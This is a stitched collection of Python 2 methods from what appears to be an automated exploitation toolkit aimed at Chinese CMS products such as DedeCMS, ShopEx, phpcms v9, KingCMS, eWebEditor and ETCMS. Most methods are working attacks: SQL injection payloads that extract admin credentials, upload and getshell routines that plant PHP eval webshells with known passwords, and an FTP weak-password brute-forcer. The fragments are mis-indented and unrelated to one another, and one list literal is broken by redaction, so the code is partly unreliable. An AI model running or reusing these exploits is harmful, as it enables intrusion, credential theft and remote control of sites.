    def three(self,arg,path):
        """Check ``path`` on host ``arg`` for a ``/plus/long.php`` that answers differently from a bogus sibling.

        Two requests go through ``self.request``: ``path/plus/long.php`` and a
        long nonsense ``.php`` name in the same directory.  Differing HTTP
        status codes are taken as evidence that ``long.php`` is present; the
        URL is then handed to ``yijuhua_cs`` and a 7-field EXP_list is put on
        ``url_exp`` with confidence 1 (check passed) or 0 (check failed).

        arg -- host prefix passed to ``self.request`` (e.g. scheme://host; not verified here).
        path -- site path under which ``/plus/`` lives.
        Returns 0 on every path, including when the broad ``except`` swallows
        an exception.
        """
        try:
            site = path+'/plus/long.php'
            testsite = path+'/plus/shaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhao.php'
            httpres = self.request(arg,site)
            code = None
            testcode = None
            testhttpres = self.request(arg,testsite)
            if testhttpres:
                testcode = testhttpres.status  # HTTP status of the bogus sibling
            if httpres:
                code = httpres.status # HTTP status of the real target
                if code != testcode: # a differing status is treated as a hit
                    #print u' \nGood,write OK ! Shell :%s%s  pass:long' % (arg,site)
                    # NOTE(review): the URL checked here uses arg unstripped, while the
                    # URL recorded below uses arg.strip(); they differ when arg has whitespace.
                    if yijuhua_cs("php",arg+site,"long"):   # args: asp|php, URL, password
                    # check passed
                        EXP_list=[1,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
                        # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
                    else:
                    # check failed
                        EXP_list=[0,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
                        # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue

#                    print "exp_dedecms_getshell---%s---%s"%(arg.strip()+site,"webshell--pass:guige")
                else:
                    # debug print removed: statuses equal, nothing found
                    return 0
            return 0
        except Exception,e:
            #print e
            return 0
 def one(self, arg):
     """POST a crafted ``goods[product_id]`` value to ``arg/?product-gnotify`` and queue any ``$^...^$`` marker in the reply.

     An ``httplib2.Http('.cache')`` client sends the form-encoded body; the
     response is searched with ``\$\^(.+)?\^\$`` and, when exactly one match
     is present, a CN_bc_shopex_4_8_5 EXP_list is put on ``url_exp``.
     NOTE(review): the list built below has 8 elements, not the 7 the
     inline comment announces.

     arg -- base URL of the site.
     Returns 1 once the request completed (match or not), 0 when any
     exception was raised.
     """
     try:
         url = arg + '/?product-gnotify'
         # form fields submitted in the POST body
         html = '1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators limit 0,1'
         data = {"goods[goods_id]": '3', "goods[product_id]": html}
         h = httplib2.Http('.cache')
         response, content = h.request(
             url,
             'POST',
             urlencode(data),
             headers={'Content-Type': 'application/x-www-form-urlencoded'})
         gre = re.compile(r'\$\^(.+)?\^\$')
         s = content
         lpwd = gre.findall(s)
         if len(lpwd) == 1:
             #pwd=lpwd[0]
             # debug print of url and matched value removed
             EXP_list = [
                 1, self.url, "bc", "CN_bc_shopex_4_8_5", url, lpwd[0], "",
                 ""
             ]
             # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- announced as 7 fields (8 present)
             url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
         else:
             pass
         return 1
     except Exception, e:
         #print e
         return 0
 def scan(self,URL):
     """Fetch two crafted ``/plus/search.php`` queries under ``URL`` and queue any ``Duplicate entry`` error text found.

     Each page is read via ``self.open_url_data``; a return of 0 aborts the
     method.  The body is searched for ``Error infos: Duplicate entry '...'``
     and the captured text is queued as CN_bc_dedecms_search_php1 /
     CN_bc_dedecms_search_php2 respectively.

     URL -- base URL of the site.
     Returns 0 when a fetch failed, otherwise None; the bare ``except``
     swallows every exception silently.
     """
     try:
         tj_data1=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\'`+]=a"
         ss=self.open_url_data(tj_data1)
         if ss==0:  # page could not be read
             return 0
         pname = re.compile( r'Error infos: Duplicate entry \'(.*?)\' for key')
         sarr = pname.findall(ss)
         if sarr:
             #print sarr[0]
             EXP_list=[1,self.url,"bc","CN_bc_dedecms_search_php1",URL+"/plus/search.php",sarr[0],""]
             # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
             url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
         tj_data1=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\'`+]=a"
         ss=self.open_url_data(tj_data1)
         if ss==0:  # page could not be read
             return 0
         pname = re.compile( r'Error infos: Duplicate entry \'(.*?)\' for key' )
         sarr = pname.findall(ss)
         if sarr:
             #print sarr[0]
             EXP_list=[1,self.url,"bc","CN_bc_dedecms_search_php2",URL+"/plus/search.php",sarr[0],""]
             # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
             url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
     except:
         pass
    def find(self, arg):
        """GET ``/plus/dst.php`` from host ``arg`` and, on HTTP 200, check it with ``yijuhua_cs`` and queue the result.

        A plain ``httplib.HTTPConnection`` is opened outside the ``try`` and is
        never closed.  On 200 the URL is printed, checked with password
        ``"cmd"``, and a CN_exp_dedecms_yijuhua EXP_list is put on ``url_exp``
        with confidence 1 or 0.

        arg -- host[:port] accepted by ``httplib.HTTPConnection``.
        Returns None normally, False when an exception was caught.
        """
        site = '/plus/dst.php'
        heareds = {
            "User-Agent":
            "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
        }
        conn = httplib.HTTPConnection(arg)
        try:
            conn.request('GET', site, None, heareds)
            httpres = conn.getresponse()
            if httpres.status == 200:
                data = 'http://%s/plus/dst.php' % arg
                print data
                if yijuhua_cs("php", data, "cmd"):  # args: asp|php, URL, password
                    # check passed
                    EXP_list = [
                        1, self.url0, self.url1, "CN_exp_dedecms_yijuhua",
                        data, "cmd", "webshell"
                    ]
                    # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                    url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                else:
                    # check failed
                    EXP_list = [
                        0, self.url0, self.url1, "CN_exp_dedecms_yijuhua",
                        data, "cmd", "webshell"
                    ]
                    # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                    url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
#                print "exp_dedecms_yijuhua---%s---%s"%(data,"webshell--pass:cmd")
        except Exception, e:
            #print e
            return False
    def one(self, arg):
        """Fetch a crafted ``/uploads/plus/search.php`` URL under ``arg`` and queue any ``Duplicate entry`` fragment in the reply.

        The page is read with ``urllib2``; ``re.findall`` rebinds ``html`` to
        the list of ``Duplicate entry '...'`` matches.  When non-empty, the
        first match is recorded in the "vuln URL" slot of a
        CN_sql_dede_57_sp1X1 EXP_list, printed, and put on ``url_exp``.

        arg -- base URL of the site.
        Returns 1 on a match, 0 otherwise or when an exception was caught.
        """
        try:
            url = arg + "/uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1"
            req = urllib2.Request(url)
            res = urllib2.urlopen(req)
            html = res.read()
            res.close()
            #print html
            html = re.findall(r"Duplicate entry \'\w+'", html)
            if html:
                #print "OK-----------------success"
                #print html[0]
                EXP_list = [
                    1, self.url0, self.url1, "CN_sql_dede_57_sp1X1", html[0],
                    "", ""
                ]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                print EXP_list
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

                return 1
            else:
                #print "no sql injection"
                return 0
        except Exception, e:
            #print e
            return 0
    def ewebeditor_asp(self, arg):  #
        """Post the local file ``long.asp.cer`` to ``arg/jms/edit/Upload.asp`` with a crafted ``style`` parameter and queue the saved name.

        The reply is searched for ``parent.UploadSaved('...')``; ``sarr[0]``
        raises IndexError when nothing matched, which the ``except`` turns
        into a return of 0.  The resulting ``/jms/edit/uploadfile/<name>`` URL
        is checked with ``yijuhua_cs`` and a CN_exp_ewebeditor_Upload_asp
        EXP_list is put on ``url_exp`` with confidence 1 or 0.

        arg -- base URL of the site.
        Returns None after queuing (no explicit return on the success path),
        0 when an exception was caught.  The opened file handle is never closed.
        """
        try:
            url = arg + "/jms/edit/Upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a"
            files = {'uploadfile': open("long.asp.cer", "rb")}
            r = requests.post(url, files=files)
            data = r.text
            #print data
            p = re.compile(r"parent.UploadSaved\('(.*?)'\)")
            sarr = p.findall(data)  # expect a single match
            name = sarr[0]
            #print name
            url = "%s/jms/edit/uploadfile/%s" % (arg, name)
            if yijuhua_cs("asp", url, "long"):  # args: asp|php, URL, password
                # check passed
                EXP_list = [
                    1, self.url0, self.url1, "CN_exp_ewebeditor_Upload_asp",
                    url, "long", "webshell"
                ]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
            else:
                # check failed
                EXP_list = [
                    0, self.url0, self.url1, "CN_exp_ewebeditor_Upload_asp",
                    url, "long", "webshell"
                ]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

        except Exception, e:
            #print e
            return 0
    def getshell(self,arg):
        """POST a PHP body to the phpcms ``crop_upload`` endpoint on ``arg`` and queue the URL echoed back in the response.

        ``arg.split('//')[1]`` yields the host for ``httplib.HTTPConnection``;
        the ``file=`` parameter points at ``self.url1/uploadfile/...``.  On
        HTTP 200 with a body, the first ``http://...Php.JPG`` match is
        rebuilt as a URL, checked with ``yijuhua_cs`` and queued as a
        CN_exp_phpcmsv9_getshell EXP_list with confidence 1 or 0.

        arg -- scheme://host URL of the site.
        Returns 1 once the request completed (match or not), 0 when an
        exception was caught.  The connection is never closed.
        """
        try:
            headers = {'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
            #data = "test<?php @eval($_POST[\''.'shaoxiao'.'\']);?>'"
            data="<?php @eval($_POST['long']);?>"
            url = arg.split('//')[1]
            site = '/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file='+self.url1+'/uploadfile/1222.thumb_.Php.JPG%20%20%20%20%20%20%20Php'
            conn = httplib.HTTPConnection(url)
            conn.request('POST',site,data,headers)
            httpres = conn.getresponse()
            html = httpres.read()
            #print html
            if httpres.status == 200 and html:
                gets = re.compile('http://(.*?)\.Php\.JPG\s')
                get = gets.findall(html)
                if get:
                    data='http://'+get[0]+'.Php.JPG%20%20%20%20%20%20%20Php'          # recorded with password "long"
                    if yijuhua_cs("php",data,"long"):   # args: asp|php, URL, password
                    # check passed
                        EXP_list=[1,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
                        # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue

                    else:
                    # check failed
                        EXP_list=[0,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
                        # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
                    #print "exp_phpcmsv9_getshell---%s---%s"%(data,"webshell--pass:long")
            return 1
        except Exception,e:
            #print e
            return 0
    def scan(self, arg):
        """Request ``/plus/carbuyaction.php`` on ``arg[1]`` with a ``%00.php`` suffixed ``code`` path and queue the URL on a non-HTML 200 reply.

        ``self.getcss(url1)`` is called twice (once as a test, once for the
        value); an empty result falls back to ``index.html``.  A 200 status
        with a non-empty body that does not start with ``<html>`` is recorded
        as a CN_bc_DedeCms_5x EXP_list on ``url_exp``.

        arg -- (url0, url1) pair; url1 must contain ``//`` so the host can be split out.
        Returns None in all cases; the bare ``except`` swallows every
        exception and the connection is never closed.
        """
        url0, url1 = arg
        url = url1.split('//')[1]
        if not self.getcss(url1):
            css = 'index.html' + '%00.php'
        else:
            css = self.getcss(url1) + '%00.php'
        site = '''/plus/carbuyaction.php?dopost=return&code=../../%s''' % css
        headers = {
            "User-Agent":
            "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
            "cookie": "code=alipay"
        }
        conn = httplib.HTTPConnection(url)
        try:
            conn.request('GET', site, None, headers)
            httpres = conn.getresponse()
            html = httpres.read()
            if (httpres.status
                    == 200) and (len(html) > 0) and html[:6] != '<html>':
                url = "%s%s" % (url1, site)

                EXP_list = [1, url0, url1, "CN_bc_DedeCms_5x", url, "", ""]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                #print EXP_list
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
        except:
            pass
 def scan(self, arg):
     """Fetch a crafted ``/search.php`` query on ``arg`` and, when the marker appears, check ``arg/Style.php`` and queue it.

     The first page is read with ``urllib2``; if the literal ``shaoxiao`` is
     echoed, ``Style.php`` is fetched and must contain ``111222`` before the
     URL is passed to ``yijuhua_cs`` and a CN_exp_kingcms_getshell EXP_list
     is put on ``url_exp`` with confidence 1 or 0.

     arg -- base URL of the site.
     Returns None normally (no explicit return), 0 when an exception was
     caught.
     """
     url = arg+'/search.php?query=shaoxiao%27%3B%3F%3E%3C%3F%66%70%75%74%73%28%66%6F%70%65%6E%28%27%53' \
               '%74%79%6C%65%2E%70%68%70%27%2C%27%77%27%29%2C%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28%' \
               '27%4D%54%45%78%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6F%4A%46%39%51%54%31%4E%55%57' \
               '%79%64%6A%62%57%51%6E%58%53%6B%37%50%7A%34%79%4D%6A%49%3D%27%29%29%3B%3F%3E%26%6D%6F%64%65%' \
               '6C%69%64%3D%31%20%6F%72%20%32%3D%32'
     # query string above is percent-encoded (URL-decode to read it)
     shellurl = arg + '/Style.php'
     try:
         html = urllib2.urlopen(url).read()
         #print html
         if 'shaoxiao' in html:
             shellhtml = urllib2.urlopen(shellurl).read()
             if '111222' in shellhtml:
                 if yijuhua_cs("php", shellurl,
                               "cmd"):  # args: asp|php, URL, password
                     # check passed
                     EXP_list = [
                         1, self.url, "exp", "CN_exp_kingcms_getshell",
                         shellurl, "cmd", "webshell"
                     ]
                     # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                     url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                 else:
                     # check failed
                     EXP_list = [
                         0, self.url, "exp", "CN_exp_kingcms_getshell",
                         shellurl, "cmd", "webshell"
                     ]
                     # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                     url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                 #print "exp_kingcms_getshell---%s---%s"%(shellurl,"webshell--pass:cmd")
     except Exception, e:
         #print e
         return 0
    def scan(self, arg):
        """Upload the local file ``long.php;.jpg`` to ``arg/celive/live/doajaxfileupload.php`` and queue the link returned.

        A ``urllib2`` opener with ``UPLOAD.MultipartPostHandler`` performs the
        multipart POST; the reply is searched for ``<a href='...'>``.  If the
        first link still contains ``.php;.jpg`` it is checked with
        ``yijuhua_cs`` and a CN_exp_etcms_Upload_shell EXP_list is printed
        and put on ``url_exp`` with confidence 1 or 0.

        arg -- base URL of the site.
        Returns None in all cases; on exception the error is printed and
        swallowed.  The opened file handle is never closed.
        """
        try:
            opener = urllib2.build_opener(UPLOAD.MultipartPostHandler)
            params = {"fileToUpload": open("long.php;.jpg", "rb")}
            url = arg + '/celive/live/doajaxfileupload.php'
            req = opener.open(url, params)
            html = req.read()
            murl = re.compile("<a href='(.*?)'")
            ok = murl.findall(html)
            print ok
            if ok and '.php;.jpg' in ok[0]:
                if yijuhua_cs("php", ok[0], "long"):  # args: asp|php, URL, password
                    # check passed
                    EXP_list = [
                        1, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
                        "long", "webshell"
                    ]
                    # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                    print EXP_list
                    url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                else:
                    # check failed
                    EXP_list = [
                        0, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
                        "long", "webshell"
                    ]
                    # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                    print EXP_list
                    url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
#                print "exp_kingcms_getshell---%s---%s"%(ok[0],"webshell--pass:long")
        except Exception, e:
            print e
            pass
 def rfid_list(self):  # iterate the collected list
     """Queue one http_200 EXP_list on ``url_exp`` for every entry in ``self.list_http``.

     Each record is [1, self.penurl, "http_200", "http_200", entry, "", "http+200"].
     Returns None normally, 0 when an exception was caught (the error is printed).
     """
     try:
         for i in self.list_http:
             #print i
             EXP_list=[1,self.penurl,"http_200","http_200",i,"","http+200"]
             # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
             url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
     except Exception,e:
         print e
         return 0
            def run(self):
                """Thread body: pop (user, password) pairs from ``accounts`` and try each against ``self.ftp`` until the list is empty.

                ``accounts``, ``Adomain``, ``port`` and ``host`` are free
                names here -- presumably closed over from the enclosing
                scope (TODO confirm).  Each outer iteration reconnects; up
                to ``MAX_RETRIES`` failed connects are tolerated before the
                thread stops.  A successful login queues a 7-field EXP_list
                on ``url_exp``.  Login errors mentioning "connection" or
                "tries" count as connection failures and force a reconnect.

                NOTE(review): the credential literals in the EXP_list below
                appear redacted ("******") in this listing and are not valid
                Python as shown.
                """
                MAX_RETRIES = 5
                retry = 0
                account = None  # currently tried (user, password) pair; None = fetch a new one
                while self.running and accounts:  # accounts: deque of (user, password)
                    try:
                        self.ftp.connect(Adomain, port)  # connect(server, port)
                    except Exception, e:
                        if retry <= MAX_RETRIES:  # author's note: is this meant to control the thread?
                            retry = retry + 1  # author's note: this variable seems unnecessary
                            continue  # try connecting again
                        else:
                            self.running = False  # stop the thread
                            break  # leave the outer loop

                    #print ".",
                    # author's note: why does one account need up to 3 attempts per connection?
                    loop_num = 0
                    while loop_num < 3:
                        loop_num = loop_num + 1

                        if not account and accounts:  # take the next pair
                            account = accounts.pop()  # pop from the deque

                        # never try with an empty account
                        if not account:  # list exhausted
                            break  # leave the inner loop
                        #print u'IP:',host,u'user:',account[0],u'password:',account[1]
                        try:
                            self.ftp.login(account[0], account[1])  # attempt FTP login
                            # no exception means the pair was accepted
                            #                            u_data="-CS_linkftp-FTP OK-IP:%s  user:%s  password:%s  time:%s"%\
                            #                                   (host,account[0],account[1],time.strftime('%Y.%m.%d-%H.%M.%S'))
                            #                            print u_data

                            EXP_list = [
                                1, host, "FTP", "user:"******"",
                                "password:"******"", "", ""
                            ]
                            # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                            url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

                            time.sleep(0.1)
                            account = None  # move on to the next pair
                        except Exception, e:
                            emsg = str(e)  # error text used to classify the failure
                            if 'connection' in emsg.lower(
                            ) or 'tries' in emsg.lower(
                            ):  # connection-level failure: reconnect and retry this account
                                retry = retry + 1
                                break  # leave the inner loop
                            else:
                                # wrong credentials: drop the pair and reset retry
                                account = None
                                retry = 0
def scan(url,ip,port):
    """Report whether TCP ``port`` on ``ip`` accepts a connection, queuing a socket_port record when it does.

    ``connect_ex`` returns 0 on success; only then is a line printed and a
    7-field EXP_list put on ``url_exp``.  The socket is closed on the normal
    path but not if an exception escapes before ``s.close()``.

    url -- label recorded with the result; not used for the connection.
    Returns None normally, 0 when the bare ``except`` swallows an exception.
    """
    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        #s.connect((ip,port))
        result=s.connect_ex((ip,port))
        if(result==0):
            print 'url:%s IP:%s:%d open'%(url,ip,port)
            EXP_list=[1,url,"url:port","socket_port",str(port)+" open","",""]
            # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
            url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
        s.close()
    except:
        return 0
    def rfid_list(self):  # iterate the collected list
        """Queue one http_200 EXP_list on ``url_exp`` for every entry in ``self.list_http``.

        Each record is [1, self.penurl[0], self.penurl[1], "http_200", entry, "", ""];
        ``self.penurl`` is indexed, so it is assumed to be a (url0, url1) pair.
        Returns None normally, 0 when an exception was caught (the error is printed).
        """
        try:
            for i in self.list_http:
                #print i
                EXP_list = [
                    1, self.penurl[0], self.penurl[1], "http_200", i, "", ""
                ]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

        except Exception, e:
            print e
            return 0
    def rfid_list(self):  # iterate the collected list
        """Queue one http_download EXP_list on ``url_exp`` for every entry in ``self.list_download``.

        Each record is [1, self.penurl[0], self.penurl[1], "http_download", entry, "", ""];
        the commented-out lines show the older single-URL record format.
        Returns None normally, 0 when an exception was caught (the error is printed).
        """
        try:
            for i in self.list_download:
                #print i
#                EXP_list=[1,self.penurl,"http_download","http_download",i,"","http+download"]
#                # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields (old format)
#                url_exp.put(EXP_list,0.5)
                EXP_list=[1,self.penurl[0],self.penurl[1],"http_download",i,"",""]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                #print EXP_list
                url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
        except Exception,e:
            print e
            return 0
 def one2(self,arg):
     """Fetch a crafted ``/plus/search.php`` URL under ``arg`` (5 s timeout) and queue the first red ``<font>`` message found.

     The body is searched with ``<font size='5' color='red'>(.*?)</font>``;
     the first capture is recorded as a CN_sql_dede_57_sp1X2 EXP_list on
     ``url_exp``.

     arg -- base URL of the site.
     Returns 0 in every case, including when an exception was caught.
     """
     try:
         html = urllib2.urlopen(arg+'/plus/search.php?keyword=as&typeArr%5B1%20%75%4E%69%6F%6E%201%5D=a',timeout=5).read()
         if html:
             r = r"<font size='5' color='red'>(.*?)</font>"
             m = re.findall(r,html)
             if m:
                 #print 'search_php Sqlinjection'+m[0]
                 EXP_list=[1,self.url,"sql","CN_sql_dede_57_sp1X2",m[0],"",""]
                 # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                 url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
         return 0
     except Exception,e:
         #print e
         return 0
                def for_list(self):
                    """Walk ``self.list`` and queue the first CMS fingerprint that ``self.open_url_cms`` confirms.

                    Each entry ``i`` is indexed as ``i[0]`` (path/link) and
                    ``i[1]`` (keyword/version label) -- assumed from usage.
                    On the first positive result a 7-field EXP_list with
                    type "cms" and ``i[1]`` in the vuln-URL slot is put on
                    ``url_exp`` and the loop stops.

                    Returns None normally, 0 when an exception was caught.
                    """
                    try:
                        for i in self.list:
                            #print i
                            if self.open_url_cms(self.URL,i[0],i[1]):  # args: url, link, version
                                # debug print of URL/link/keyword/version removed
                                #list=[self.URL,i[1]]
                                #print list

                                EXP_list=[1,self.url0,self.URL,"cms",i[1],"",""]
                                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                                url_exp.put(EXP_list,0.5)   # hand the record to the shared url_exp queue
                                break # first hit is enough
                    except Exception,e:
                        #print e
                        return 0
class CS_linkftp(threading.Thread):
    def __init__(self, openurl):
        """Initialise the thread and immediately run ``ftp_login`` against the host in ``openurl``.

        openurl -- URL string; the first 7 characters (presumably a
        "scheme://" prefix -- TODO confirm) are dropped to obtain the host.
        Note that the scan is started from the constructor, not from ``start()``.
        """
        threading.Thread.__init__(self)
        self.Internet = 10  # counter used to re-check network state every N iterations (per original comment)
        self.openftp = openurl[7:]
        #self.Chost=""  # host address
        self.ftp_login(self.openftp)

    # Class-level wordlists loaded once at import time from the working
    # directory; a missing file raises at class definition.  The handles
    # returned by open() are never closed.
    WEAK_USERNAME = [
        p.replace('\n', '') for p in open('username.dic').readlines()
    ]
    WEAK_PASSWORD = [
        p.replace('\n', '') for p in open('password.dic').readlines()
    ]

    def get_sdomain(self, domain):  # www.baidu.com -> baidu.com
        """Reduce a host name to its registrable domain.

        Labels are walked left to right.  A label found in the built-in
        suffix table is appended to the running result; any other label
        restarts the result from that label alone.  Once a suffix has been
        seen the joined result is returned, otherwise ``''``.

        ``get_sdomain(None, 'www.baidu.com')`` -> ``'baidu.com'``
        ``get_sdomain(None, 'localhost')`` -> ``''``
        """
        known_suffixes = frozenset((
            'ac', 'ad', 'ae', 'aero', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'arpa', 'as', 'asia', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'biz', 'bj', 'bm', 'bn', 'bo', 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cat', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'com', 'coop', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'ec', 'edu', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gov', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'info', 'int', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jobs', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mil', 'mk', 'ml', 'mm', 'mn', 'mo', 'mobi', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'name', 'nc', 'ne', 'net', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om', 'org', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'pro', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tel', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug', 'uk', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'xn', 'ye', 'yt', 'za', 'zm', 'zw',
        ))
        kept = []
        saw_suffix = False
        for label in domain.split('.'):
            if label not in known_suffixes:
                # a non-suffix label restarts the candidate domain
                kept = [label]
                continue
            kept.append(label)
            saw_suffix = True
        if not saw_suffix:
            return ''
        return '.'.join(kept)

    def get_ssdomain(self, domain):  #域名拆解www.baidu.com->baidu
        sdomain = self.get_sdomain(domain)  #先解析一道
        ssdomian = sdomain.partition('.')[0] if sdomain else ''
        return ssdomian

    def ftp_login(self, host, nthreads=10, port=21):  # entry point: scan the given host
        """Connect to the FTP service on ``host``:``port`` and record an anonymous login if one is accepted.

        A first connection only verifies reachability (errors are printed
        and end the method with 0).  A second connection attempts
        ``login("anonymous", "")``; success queues a 7-field EXP_list on
        ``url_exp`` and returns 0, failure is swallowed and the method
        continues.  ``nthreads`` is unused in the visible part.

        NOTE(review): this listing appears truncated after the anonymous
        check (the body continues in another excerpt), and the password
